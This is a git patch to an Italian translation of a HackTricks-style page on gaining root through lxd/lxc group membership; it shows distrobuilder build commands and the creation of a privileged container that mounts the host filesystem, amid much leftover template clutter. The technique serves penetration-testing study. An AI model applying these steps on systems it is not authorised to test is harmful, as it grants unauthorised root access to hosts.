From ef0482f35bc9bc1fe97dc623e9664f80ae1c99b5 Mon Sep 17 00:00:00 2001 From: Translator Date: Mon, 28 Oct 2024 17:11:25 +0000 Subject: [PATCH] Translated ['linux-hardening/privilege-escalation/interesting-groups-lin --- .../lxd-privilege-escalation.md | 191 +++++++++++------- 1 file changed, 114 insertions(+), 77 deletions(-) diff --git a/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md b/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md index 6ce8f7cb8..2e20d5001 100644 --- a/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md +++ b/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md @@ -1,8 +1,8 @@ # lxd/lxc Group - Privilege escalation {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
@@ -14,28 +14,6 @@ Learn & practice GCP Hacking: {% endhint %} -{% endhint %} -{% endhint %} -{% endhint %} -{% endhint %} -{% endhint %} -{% endhint %} -{% endhint %} -{% endhint %} -{% endhint %} -{% endhint %} -{% endhint %} -{% endhint %} -{% endhint %} -{% endhint %} -{% endhint %} -{% endhint %} -{% endhint %} -{% endhint %} -{% endhint %} -{% endhint %} -{% endhint %} -{% endhint %} Se appartieni al gruppo _**lxd**_ **o** _**lxc**_, puoi diventare root @@ -46,20 +24,27 @@ Se appartieni al gruppo _**lxd**_ **o** _**lxc**_, puoi diventare root Puoi installare sulla tua macchina questo distro builder: [https://github.com/lxc/distrobuilder ](https://github.com/lxc/distrobuilder)(segui le istruzioni del github): ```bash sudo su -#Install requirements +# Install requirements sudo apt update sudo apt install -y git golang-go debootstrap rsync gpg squashfs-tools -#Clone repo + +# Clone repo git clone https://github.com/lxc/distrobuilder -#Make distrobuilder + +# Make distrobuilder cd distrobuilder make -#Prepare the creation of alpine + +# Prepare the creation of alpine mkdir -p $HOME/ContainerImages/alpine/ cd $HOME/ContainerImages/alpine/ wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml -#Create the container + +# Create the container +## Using build-lxd sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.18 +## Using build-lxc +sudo $HOME/go/bin/distrobuilder build-lxc alpine.yaml -o image.release=3.18 ``` Carica i file **lxd.tar.xz** e **rootfs.squashfs**, aggiungi l'immagine al repository e crea un contenitore: ```bash @@ -109,7 +94,8 @@ lxc init myimage mycontainer -c security.privileged=true # mount the /root into the image lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true -{% hint style="success" %} +
+ Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) @@ -122,52 +108,103 @@ Learn & practice GCP Hacking: -{% endhint %} -
-{% endhint %} - -{% endhint %} - -{% endhint %} - -{% endhint %} - -{% endhint %} - -{% endhint %} - -{% endhint %} - -{% endhint %} - -{% endhint %} - -{% endhint %} - -{% endhint %} - -{% endhint %} - -{% endhint %} - -{% endhint %} - -{% endhint %} - -{% endhint %} - -{% endhint %} - -{% endhint %} - -{% endhint %} - -{% endhint %} - -{% endhint %} - -{% endhint %}hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. -{% endhint %} + + -{% endhint %} + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + + + + + + +``` +